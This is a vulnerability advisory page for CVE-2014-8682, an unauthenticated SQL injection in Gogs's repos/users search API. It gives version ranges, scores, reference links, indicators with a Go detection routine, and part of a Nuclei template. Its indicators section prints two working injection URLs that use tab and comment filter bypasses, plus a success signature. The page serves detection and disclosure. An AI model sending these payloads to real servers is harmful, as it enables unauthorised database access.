CVE-2014-8682
Published 2014-11-21
Priority: P2, 63, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 34.27% (98.2th percentile)
Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gogits | gogs | <= 0.5.5 | — |
| gogits | gogs | — | — |
| gogits | gogs | — | — |
| gogits | gogs | — | — |
| gogits | gogs | — | — |
| gogits | gogs | — | — |
| gogs.io | gogs | >= 0.3.1 < 0.5.8 | 0.5.8 |
Detection & IOCs
url: /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
url: /api/v1/users/search?q='/**/and/**/false)/**/union/**/select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/mysql.db/**/where/**/('%25'%3D'
- Successful exploitation of the /api/v1/repos/search endpoint returns a JSON response body containing all three of the strings '"ok":true', '"data"', and '"repolink":"' simultaneously with HTTP 200.
- The SQL injection payload uses tab characters (0x09 / %09) as whitespace substitutes instead of spaces (0x20), because the FilterSQLInject function strips spaces. Detection rules should look for tab-delimited UNION SELECT patterns in the q parameter.
- The /api/v1/users/search PoC uses /**/ comment blocks as whitespace substitutes in the q parameter to bypass the space filter; monitor for comment-delimited UNION SELECT patterns in requests to this endpoint.
- The SQL injection is only exploitable on Gogs versions >= v0.3.1-9-g49dc57e through 0.5.x before 0.5.6.1105 Beta; versions from 0.5.6.1105 onward use prepared statements and are not vulnerable.
- Starting from v0.5.6.1025-g83283b, commas are also filtered by FilterSQLInject in addition to spaces, requiring attackers to use JOIN-based UNION payloads instead of comma-separated column lists.
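The tab-delimited and comment-delimited patterns described above can be matched once `q` is percent-decoded and `/*...*/` comments are collapsed to whitespace. This is an added example, not part of the advisory or of Gogs; the function name `Classify`, its verdict labels and the sample request URIs are constructed for illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

var (
	searchPath  = regexp.MustCompile(`/api/v1/(?:repos|users)/search/?$`)
	sqlComment  = regexp.MustCompile(`(?s)/\*.*?\*/`) // SQL treats these as whitespace
	unionSelect = regexp.MustCompile(`(?i)\bunion\s+(?:all\s+)?select\b`)
)

// Classify returns "" when the request is not flagged, otherwise the separator
// seen around UNION SELECT in q: "comment", "tab" (any control whitespace) or "space".
func Classify(requestURI string) string {
	u, err := url.ParseRequestURI(requestURI)
	if err != nil || !searchPath.MatchString(u.Path) {
		return ""
	}
	params, _ := url.ParseQuery(u.RawQuery) // decodes %09 into a real tab
	for _, q := range params["q"] {
		if !unionSelect.MatchString(sqlComment.ReplaceAllString(q, " ")) {
			continue
		}
		if strings.Contains(q, "/*") {
			return "comment"
		}
		if strings.ContainsAny(q, "\t\n\r\v\f") {
			return "tab"
		}
		return "space"
	}
	return ""
}

// Constructed sample request URIs, not taken from a real server.
var samples = []string{
	"/api/v1/repos/search?q=x%09UNION%09SELECT%091",
	"/api/v1/users/search?q=x/**/union/**/select/**/1",
	"/api/v1/repos/search?q=union+station",
}

func main() {
	for _, s := range samples {
		fmt.Printf("%-9q %s\n", Classify(s), s)
	}
}
```

A "space" verdict still marks an attempt, even though the page notes that FilterSQLInject strips spaces.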
OSV
SQL Injection in Gogs in gogs.io/gogs
osv·2024-08-21
CVE-2014-8682 SQL Injection in Gogs in gogs.io/gogs
GHSA
SQL Injection in Gogs
ghsa·2021-06-29
CVE-2014-8682 [HIGH] CWE-89 SQL Injection in Gogs
OSV
SQL Injection in Gogs
osv·2021-06-29
CVE-2014-8682 [HIGH] SQL Injection in Gogs
No detection rules found.
Exploit-DB
Gogs - 'users'/'repos' '?q' SQL Injection
exploitdb·2014-11-14·CVSS 7.5
CVE-2014-8682 [HIGH] Gogs - 'users'/'repos' '?q' SQL Injection
---
Unauthenticated SQL Injection in Gogs repository search
Researcher: Timo Schmid
Description
Gogs (Go Git Service) is a painless self-hosted Git Service written in Go. (taken from [1])
It is very similar to the GitHub hosting platform. Multiple users can create multiple repositories and share code with others with the git version control system. Repositories can be marked as public or private to prevent access from unauthorized users.
Gogs provides an API view to give JavaScript code the possibility to search for existing repositories in the system. This view is accessible at /api/v1/repos/search?q=.
The q parameter of this view is vulnerable to SQL injection.
Exploitation Technique
Remote
Severity Level
Critical
CVSS Base Score
8.
Nuclei
Gogs (Go Git Service) - SQL Injection
nuclei·CVSS 7.5
CVE-2014-8682 [HIGH] Gogs (Go Git Service) - SQL Injection
Template:
id: CVE-2014-8682
info:
  name: Gogs (Go Git Service) - SQL Injection
  author: dhiyaneshDK,daffainfo
  severity: high
  description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/
http://gogs.io/docs/intro/change_log.html
http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
http://seclists.org/fulldisclosure/2014/Nov/33
http://www.exploit-db.com/exploits/35238
http://www.securityfocus.com/archive/1/533995/100/0/threaded
http://www.securityfocus.com/bid/71187
https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d